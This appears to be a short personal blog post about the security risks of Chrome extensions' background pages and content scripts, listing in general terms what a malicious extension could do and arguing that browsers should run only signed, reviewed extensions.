Security - Google Chrome Background Pages
UPDATE: Actually Chrome Extensions do ask you for a permission, when you install them to have privileged access to certain domains, which they couldn’t access due to Cross Domain Origin Policy. However this just means, that e.g. they cannot do e.g. a POST to yourbank.com, if you hadn’t allowed them. But nothing hinders them to spy on your passwords, etc.
This is a fast writeup of what came to my mind today. As the Browser is always more becoming a Platform for “Applications” (Extensions) to run on, I started thinking about some security implications today.
I am using the Google Chrome Extension API lately to develop for a Google Chrome Extension.
I realized quickly, that many many extensions can load Javascript (so called contentscripts) on every page, doing all kind of weird stuff.
This is nothing new, cause everyone knows that Javascript is not safe right? Well no!
Javascript is as safe as any other language, but the point is the architecture of Web-Browsers today allows extensions to run scripts and potentially, spy on your web-browsing, banking activities and so on.
Background pages and content scripts are actually a big security flaw. Just immagine only some things they can do:
- open and close tabs in the background
- click ok for you somewhere in a page (e.g. while you are authorizing someone via oAuth)
- listen to keystrokes
- make cross-domain XMLHTTPRequests in the background using or transmitting your session secret and/or banks mobile TAN.
The only “normative” force is that extensions are actually delivered in Javascript and therefore can be inspected by developers. So normally they won’t do weird stuff. But anyways, who knows?
I think Google should start allowing only signed extensions, which they have reviewed to not do any harmful stuff, similar to how Apple reviews their apps and let only signed extensions run on the Google Chrome platform. By the way the same is true other web-browsers like Firefox and IE9 too.
I think Safari is the only browser allowing only signed extensions, which is a big plus.
Comments are appreciated!
